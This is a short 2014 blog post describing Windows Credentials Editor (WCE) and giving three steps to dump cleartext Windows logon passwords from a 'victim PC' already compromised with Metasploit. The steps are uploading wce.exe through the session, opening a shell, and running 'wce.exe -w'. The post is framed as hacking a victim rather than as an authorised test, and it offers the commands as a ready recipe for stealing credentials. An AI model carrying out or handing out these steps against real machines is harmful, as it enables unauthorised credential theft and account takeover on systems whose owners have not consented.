Monday, March 31, 2014

Hack Remote Windows Passwords in Plain Text with WCE

Windows Credentials Editor (WCE) is a security tool that allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon. WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7 and 2008.

First Hack the Victim PC Using Metasploit

Step 1: Now upload the wce.exe in victim pc using
Upload /pentest/passwords/wce/wce.exe .
Step 2: type shell to get the command prompt of victim pc

Step 3: now use wce.exe –w command to get password in text form